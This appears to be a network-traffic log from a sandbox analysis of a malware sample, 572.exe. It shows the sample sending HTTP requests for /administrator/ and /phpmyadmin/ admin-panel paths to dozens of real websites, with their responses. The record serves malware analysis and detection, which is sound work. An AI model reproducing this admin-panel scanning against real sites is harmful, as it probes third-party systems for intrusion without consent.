User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://pan.baidu.com/administrator/
Feb 5, 2024 12:14:51.168925047 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:14:51.376964092 CET  1280  IN  HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:14:50 GMT
Etag: W/"61128294-3feb"
Logid: 8900799505880304556
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1; expires=Tue, 04-Feb-25 11:14:50 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900799505880304556
Yme: ZIGW/y8rX0QMaTYYTmvhrm5XvfwASwfzoAJPwiY=
Transfer-Encoding: chunked
Feb 5, 2024 12:14:51.537201881 CET | 1280 | IN | HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:14:51 GMT
Etag: W/"60fffc02-1d60"
Last-Modified: Tue, 27 Jul 2021 12:28:50 GMT
Logid: 8900799606745064524
Server: nginx
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900799606745064524
Yme: ZIGW/y8rX0gMajEE
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
171 | 192.168.2.6 | 55054 | 36.255.71.45 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.816117048 CET | 179 | OUT | GET /administrator/ HTTP/1.1
Host: instructory.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.192037106 CET | 153 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:14:55 GMT
content-length: 0
location: https://instructory.net/administrator/
cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
172 | 192.168.2.6 | 55255 | 185.120.71.24 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.839792967 CET | 176 | OUT | GET /administrator/ HTTP/1.1
Host: analvids.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.049164057 CET | 384 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://www.analvids.com/administrator/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
173 | 192.168.2.6 | 55367 | 35.186.223.180 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.901544094 CET | 185 | OUT | GET /administrator/ HTTP/1.1
Host: sigapbanjarmasin.info
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.724751949 CET | 237 | IN | HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
Content-Encoding: gzip
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: Google Frontend
Cache-Control: private
Via: 1.1 google
Transfer-Encoding: chunked
Feb 5, 2024 12:14:51.997791052 CET | 248 | OUT | GET /administrator/index.php HTTP/1.1
Host: sigapbanjarmasin.info
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://sigapbanjarmasin.info/administrator/
Feb 5, 2024 12:14:55.986587048 CET | 237 | IN | HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
Content-Encoding: gzip
Date: Mon, 05 Feb 2024 11:14:55 GMT
Server: Google Frontend
Cache-Control: private
Via: 1.1 google
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
174 | 192.168.2.6 | 55370 | 96.7.224.178 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.905585051 CET | 234 | OUT | GET /administrator/index.php HTTP/1.1
Host: naukrigulf.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://naukrigulf.com/administrator/
Feb 5, 2024 12:14:51.017050982 CET | 648 | IN | HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 290
Expires: Mon, 05 Feb 2024 11:14:50 GMT
Date: Mon, 05 Feb 2024 11:14:50 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Server-Timing: ak_p; desc="1707131690957_1611129006_213759812_14_9815_102_0_-";dur=1
Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;administrator&#47;index&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131690&#46;cbdb744</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
175 | 192.168.2.6 | 55363 | 172.66.43.117 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.915935993 CET | 176 | OUT | GET /administrator/ HTTP/1.1
Host: login.adf.ly
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.135803938 CET | 1286 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
cache-control: no-cache, no-store, must-revalidate, max-age=0
location: https://login.adf.ly/administrator/
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YvdlzcHvjtW4prHJFlfOyFbLNrJHBS%2FK3sFVmO61nDHIzbACVd7bgJrCzeJktNJvusxfC%2Bpg8oNwWgTxb1wVR09RluX48NM8C852oxydUKwUT3mONPp6L%2BC9izF8Cng%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6c88d44531-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;
Feb 5, 2024 12:14:51.135821104 CET | 108 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
Feb 5, 2024 12:14:51.135835886 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:05.910253048 CET | 185 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.061811924 CET | 1286 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QNUOzSQcRawAISIQWns6riy1cSfV3UUEX489tQf7Vl%2Fsi2H4xLhd3Hvogco8GVmU2Y0tjf2UxHIPC0pY2wX6wtMWo7lwJRVrH%2BqD5glUmmRL1M%2FUBtNRaeptqpw7Ilk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd414dda4531-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-
Feb 5, 2024 12:16:06.061831951 CET | 117 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
Feb 5, 2024 12:16:06.061846972 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
176 | 192.168.2.6 | 55365 | 104.22.43.158 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.916166067 CET | 184 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.252774954 CET | 530 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.casinocontroller.com/admin/istrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6c88bd17f3-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.casinocontroller.com/admin/istrator/">here</a>.</p></body></html>
Feb 5, 2024 12:14:51.252790928 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:15:00.923698902 CET | 193 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.249514103 CET548INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.casinocontroller.com/admin/istrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abbab1b0017f3-ATL
Data Ascii: f1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.casinocontroller.com/admin/istrator/index.php">here</a>.</p></body></html>
Feb 5, 2024 12:15:01.249535084 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
177 | 192.168.2.6 | 55393 | 23.4.32.216 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.077855110 CET | 182 | OUT | GET /administrator/ HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.184674025 CET | 188 | IN | HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: https://steamcommunity.com/administrator/
Date: Mon, 05 Feb 2024 11:14:51 GMT
Connection: keep-alive
Feb 5, 2024 12:16:06.438123941 CET | 191 | OUT | GET /administrator/index.php HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.544514894 CET | 197 | IN | HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: https://steamcommunity.com/administrator/index.php
Date: Mon, 05 Feb 2024 11:16:06 GMT
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
178 | 192.168.2.6 | 55201 | 31.13.65.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.077856064 CET | 180 | OUT | GET /administrator/ HTTP/1.1
Host: web.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.179819107 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
Location: https://web.facebook.com/administrator/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:14:51 GMT
Connection: keep-alive
Content-Length: 0
Feb 5, 2024 12:16:06.371506929 CET | 189 | OUT | GET /administrator/index.php HTTP/1.1
Host: web.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.473505974 CET | 218 | IN | HTTP/1.1 301 Moved Permanently
Location: https://web.facebook.com/administrator/index.php
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:06 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
179 | 192.168.2.6 | 55097 | 34.250.93.112 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.077856064 CET | 171 | OUT | GET /administrator/ HTTP/1.1
Host: kwyk.fr
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.281100988 CET | 412 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Location: https://www.kwyk.fr/administrator/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Feb 5, 2024 12:15:00.922085047 CET  180  OUT  GET /administrator/index.php HTTP/1.1
Host: kwyk.fr
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:01.125452042 CET  421  IN  HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:15:01 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Location: https://www.kwyk.fr/administrator/index.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
180         192.168.2.6  55200        162.241.203.30  80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:51.077878952 CET  178  OUT  GET /administrator/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.319349051 CET  226  IN  HTTP/1.1 409 Conflict
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: Apache
Content-Length: 83
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
181         192.168.2.6  55204        3.161.150.89    80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:51.077975035 CET  183  OUT  GET /administrator/ HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.179802895 CET  583  IN  HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://account.booking.com/administrator/
X-Cache: Redirect from cloudfront
Via: 1.1 4a033384071e0f101ee5d0d0aaf707c2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: 9WsE6-0b3UxSMASMzXZR0p-sD-HeMVwsZPC5-jHFbEDkEpi0SfXszQ==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
Feb 5, 2024 12:16:05.914650917 CET  192  OUT  GET /administrator/index.php HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.016349077 CET  592  IN  HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:05 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://account.booking.com/administrator/index.php
X-Cache: Redirect from cloudfront
Via: 1.1 4a033384071e0f101ee5d0d0aaf707c2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: D79l7LkKzRzZR9PWKhRiabhawB01zH_LLrPBotwUjxLevDmmFKSUbw==
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
182 | 192.168.2.6 | 55067 | 82.221.28.171 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.077975035 CET | 169 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.316490889 CET | 532 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=60
                                                                                                                                                                                                                                                                                                                                                                Location: https://uh.is/administrator/
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
183 | 192.168.2.6 | 55275 | 164.100.213.210 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.111188889 CET | 174 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.509741068 CET | 142 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
Feb 5, 2024 12:14:58.657315016 CET | 183 | OUT | GET /administrator/index.php HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:59.058114052 CET | 151 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
184 | 192.168.2.6 | 55269 | 202.81.112.32 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.191092968 CET | 186 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: testconnect.garena.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.507335901 CET | 360 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://testconnect.garena.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
185 | 192.168.2.6 | 55581 | 172.66.43.64 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.248572111 CET | 184 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nuevopacto.runacode.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.380322933 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:06 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kUQx2bPKD6Q8B4mYJoXNgGMvD%2BUbPboVXzm3qK2TBYFIUSGoPxAn5ItW7xWZ7V2E98vveF%2FVqnmdSwHs2ftsFer1TrJAPLP8tJyP3LESiunzVp%2BSrBzR1ZT4CRmCnjyI9p%2BxDNgO04YG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb6eab8c0725-ATL
Content-Encoding: gzip
Feb 5, 2024 12:14:51.380356073 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
186 | 192.168.2.6 | 55592 | 104.17.62.50 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.248578072 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: accounts.faceit.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.388902903 CET | 757 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
